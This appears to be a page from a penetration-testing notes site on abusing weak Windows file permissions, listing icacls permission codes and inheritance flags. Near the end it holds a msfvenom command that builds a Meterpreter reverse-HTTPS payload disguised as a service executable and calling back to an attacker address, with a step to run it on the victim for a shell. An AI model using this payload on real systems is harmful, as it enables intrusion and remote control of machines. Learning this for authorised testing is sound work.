Abusing Files Permissions

Check for file permission. Example below shows everyone has full permission.

# icacls preserves the canonical order of ACE entries as:

• Explicit denials
• Explicit grants
• Inherited denials
• Inherited grants

# Perm is a permission mask that can be specified in one of the following forms:

# A sequence of simple rights:
• F (full access)
• M (modify access)
• RX (read and execute access)
• R (read-only access)
• W (write-only access)

# A comma-separated list in parenthesis of specific rights:
• D (delete)
• RC (read control)
• WDAC (write DAC)
• WO (write owner)
• S (synchronize)
• AS (access system security)
• MA (maximum allowed)
• GR (generic read)
• GW (generic write)
• GE (generic execute)
• GA (generic all)
• RD (read data/list directory)
• WD (write data/add file)
• AD (append data/add subdirectory)
• REA (read extended attributes)
• WEA (write extended attributes)
• X (execute/traverse)
• DC (delete child)
• RA (read attributes)
• WA (write attributes)

# Inheritance rights may precede either Perm form, and they are applied only to directories:

• (OI): object inherit
• (CI): container inherit
• (IO): inherit only
• (NP): do not propagate inherit
• (I): permission inherited from parent container
 

# Create a payload we can use to abuse
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=192.168.204.128 LPORT=443  -f exe -o ftpbasicsvr.exe    

# Copy the malicious file to the victim and execute it and then then get a shell

PreviousWindows PrivEsc Exploits NextInteresting Files

Last updated 5 years ago